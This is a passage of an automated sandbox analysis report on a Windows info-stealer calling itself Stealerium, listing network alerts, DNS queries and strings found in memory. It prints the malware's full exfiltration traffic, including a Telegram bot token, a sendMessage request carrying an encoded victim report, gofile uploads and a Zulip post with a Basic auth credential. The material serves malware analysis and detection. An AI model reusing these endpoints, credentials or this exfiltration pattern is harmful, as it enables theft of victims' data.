                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2834392 - Severity 1 - ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check : 192.168.2.4:49731 -> 188.138.68.212:80
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: https://szurubooru.zulipchat.com/api/v1/messages
                          Uses the Telegram API (likely for C&C communication)
                          Source: unknownDNS query: name: api.telegram.org
                          Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/processes_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/gpu_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/MachineGuid.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_username_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/getMe HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /servers HTTP/1.1Host: api.gofile.ioConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /uploadfile HTTP/1.1Content-Type: multipart/form-data; boundary="b1c2b79f-406c-402d-977e-4b21d28af094"Host: store6.gofile.ioContent-Length: 121972Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/sendMessage?chat_id=-4556397073&text=%60%60%60%0A%F0%9F%98%B9%20%2AStealerium%20v3.5.2%20-%20Report%3A%2A%0ADate%3A%202024-11-29%204%3A57%3A07%20am%0ASystem%3A%20Microsoft%20Windows%2010%20Pro%20%2864%20Bit%29%0AUsername%3A%20user%0ACompName%3A%20724536%0ALanguage%3A%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus%3A%20Windows%20Defender%0A%0A%F0%9F%92%BB%20%2AHardware%3A%2A%0ACPU%3A%20Intel%28R%29%20Core%28TM%292%20CPU%206600%20%40%202.40%20GHz%0AGPU%3A%20PA_NMRCU%0ARAM%3A%204095MB%0APower%3A%20NoSystemBattery%20%28100%25%29%0AScreen%3A%201280x1024%0AWebcams%20count%3A%200%0A%0A%F0%9F%93%A1%20%2ANetwork%3A%2A%20%0AGateway%20IP%3A%20192.168.2.1%0AInternal%20IP%3A%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system%21%0AExternal%20IP%3A%208.46.123.228%0A%0A%F0%9F%92%B8%20%2ADomains%20info%3A%2A%0A%20%20%20-%20%F0%9F%8F%A6%20%2ABanking%20services%2A%20%28No%20data%29%0A%20%20%20-%20%F0%9F%92%B0%20%2ACryptocurrency%20services%2A%20%28No%20data%29%0A%20%20%20-%20%F0%9F%8D%93%20%2APorn%20websites%2A%20%28No%20data%29%0A%0A%F0%9F%8C%90%20%2ABrowsers%3A%2A%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History%3A%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks%3A%205%0A%0A%F0%9F%97%83%20%2ASoftware%3A%2A%0A%0A%F0%9F%A7%AD%20%2ADevice%3A%2A%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%F0%9F%A6%A0%20%2AInstallation%3A%2A%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Startup%20disabled%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Clipper%20not%20installed%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Keylogger%20not%20installed%0A%0A%F0%9F%93%84%20%2AFile%20Grabber%3A%2A%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images%3A%2020%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents%3A%2030%0A%0A%F0%9F%94%97%20%5BArchive%20download%20link%5D%28https%3A%2F%2Fgofile.io%2Fd%2FliMaKC%29%0A%F0%9F%94%90%20Archive%20password%20is%3A%20%227035101d0d346f9a1fd3ad400ac83b90%22%60%60%60&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /api/v1/messages HTTP/1.1Authorization: Basic c3p1cnVib29ydUBnbWFpbC5jb206Zmd3VDV1bWJyUWRXNlkxYnVJV1pKSzZTMkZWUVpBZVM=Content-Type: application/x-www-form-urlencodedHost: szurubooru.zulipchat.comContent-Length: 1691Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                          Source: Joe Sandbox ViewIP Address: 104.16.184.241 104.16.184.241
                          Source: Joe Sandbox ViewIP Address: 45.112.123.126 45.112.123.126
                          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                          Source: unknownDNS query: name: ip-score.com
                          Source: unknownDNS query: name: ip-score.com
                          Source: unknownDNS query: name: icanhazip.com
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 104.16.184.241:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 188.138.68.212:80
                          Source: Network trafficSuricata IDS: 2029323 - Severity 1 - ET MALWARE Possible Generic RAT over Telegram API : 192.168.2.4:49748 -> 149.154.167.220:443
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
                          Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/processes_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/gpu_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/MachineGuid.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_username_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /checkip/ HTTP/1.1User-Agent: AutoItHost: ip-score.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/getMe HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /servers HTTP/1.1Host: api.gofile.ioConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/sendMessage?chat_id=-4556397073&text=%60%60%60%0A%F0%9F%98%B9%20%2AStealerium%20v3.5.2%20-%20Report%3A%2A%0ADate%3A%202024-11-29%204%3A57%3A07%20am%0ASystem%3A%20Microsoft%20Windows%2010%20Pro%20%2864%20Bit%29%0AUsername%3A%20user%0ACompName%3A%20724536%0ALanguage%3A%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus%3A%20Windows%20Defender%0A%0A%F0%9F%92%BB%20%2AHardware%3A%2A%0ACPU%3A%20Intel%28R%29%20Core%28TM%292%20CPU%206600%20%40%202.40%20GHz%0AGPU%3A%20PA_NMRCU%0ARAM%3A%204095MB%0APower%3A%20NoSystemBattery%20%28100%25%29%0AScreen%3A%201280x1024%0AWebcams%20count%3A%200%0A%0A%F0%9F%93%A1%20%2ANetwork%3A%2A%20%0AGateway%20IP%3A%20192.168.2.1%0AInternal%20IP%3A%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system%21%0AExternal%20IP%3A%208.46.123.228%0A%0A%F0%9F%92%B8%20%2ADomains%20info%3A%2A%0A%20%20%20-%20%F0%9F%8F%A6%20%2ABanking%20services%2A%20%28No%20data%29%0A%20%20%20-%20%F0%9F%92%B0%20%2ACryptocurrency%20services%2A%20%28No%20data%29%0A%20%20%20-%20%F0%9F%8D%93%20%2APorn%20websites%2A%20%28No%20data%29%0A%0A%F0%9F%8C%90%20%2ABrowsers%3A%2A%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History%3A%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks%3A%205%0A%0A%F0%9F%97%83%20%2ASoftware%3A%2A%0A%0A%F0%9F%A7%AD%20%2ADevice%3A%2A%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%F0%9F%A6%A0%20%2AInstallation%3A%2A%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Startup%20disabled%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Clipper%20not%20installed%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Keylogger%20not%20installed%0A%0A%F0%9F%93%84%20%2AFile%20Grabber%3A%2A%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images%3A%2020%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents%3A%2030%0A%0A%F0%9F%94%97%20%5BArchive%20download%20link%5D%28https%3A%2F%2Fgofile.io%2Fd%2FliMaKC%29%0A%F0%9F%94%90%20Archive%20password%20is%3A%20%227035101d0d346f9a1fd3ad400ac83b90%22%60%60%60&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /checkip/ HTTP/1.1User-Agent: AutoItHost: ip-score.com
                          Source: global trafficHTTP traffic detected: GET /checkip/ HTTP/1.1User-Agent: AutoItHost: ip-score.com
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /checkip/ HTTP/1.1User-Agent: AutoItHost: ip-score.com
                          Source: global trafficHTTP traffic detected: GET /checkip/ HTTP/1.1User-Agent: AutoItHost: ip-score.com
                          Source: global trafficHTTP traffic detected: GET /checkip/ HTTP/1.1User-Agent: AutoItHost: ip-score.com
                          Source: global trafficHTTP traffic detected: GET /checkip/ HTTP/1.1User-Agent: AutoItHost: ip-score.com
                          Source: global trafficHTTP traffic detected: GET /checkip/ HTTP/1.1User-Agent: AutoItHost: ip-score.com
                          Source: global trafficHTTP traffic detected: GET /checkip/ HTTP/1.1User-Agent: AutoItHost: ip-score.com
                          Source: global trafficHTTP traffic detected: GET /checkip/ HTTP/1.1User-Agent: AutoItHost: ip-score.com
                          Source: global trafficHTTP traffic detected: GET /checkip/ HTTP/1.1User-Agent: AutoItHost: ip-score.com
                          Source: global trafficHTTP traffic detected: GET /checkip/ HTTP/1.1User-Agent: AutoItHost: ip-score.com
                          Source: global trafficHTTP traffic detected: GET /checkip/ HTTP/1.1User-Agent: AutoItHost: ip-score.com
                          Source: global trafficDNS traffic detected: DNS query: ip-score.com
                          Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                          Source: global trafficDNS traffic detected: DNS query: 56.14.11.0.in-addr.arpa
                          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                          Source: global trafficDNS traffic detected: DNS query: icanhazip.com
                          Source: global trafficDNS traffic detected: DNS query: api.gofile.io
                          Source: global trafficDNS traffic detected: DNS query: store6.gofile.io
                          Source: global trafficDNS traffic detected: DNS query: szurubooru.zulipchat.com
                          Source: unknownHTTP traffic detected: POST /uploadfile HTTP/1.1Content-Type: multipart/form-data; boundary="b1c2b79f-406c-402d-977e-4b21d28af094"Host: store6.gofile.ioContent-Length: 121972Expect: 100-continueConnection: Keep-Alive
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.gofile.io
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB381AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                          Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                          Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                          Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                          Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
                          Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB384E9000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/.com/checkip/
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/.com/checkip/ificates
                          Source: LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/1865
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/3
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000735536.00000000017D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/C1%k.
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/LMEM
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/TTC:
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/W
                          Source: LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/fic
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/ificates
                          Source: LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/n
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/oft
                          Source: LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/yiLkZ
                          Source: JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                          Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                          Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                          Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                          Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store6.gofile.io
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB381D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://szurubooru.zulipchat.com
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000735536.00000000017D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/files/beta/autoit/archive/sqlite/SQLite3
                          Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                          Source: tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: JOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/binaryformatter
                          Source: JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
                          Source: JOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/servers
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB38175000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/getMe
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB38175000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/sendMessage
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB381AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/sendMessage?chat_id=-4556
                          Source: tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
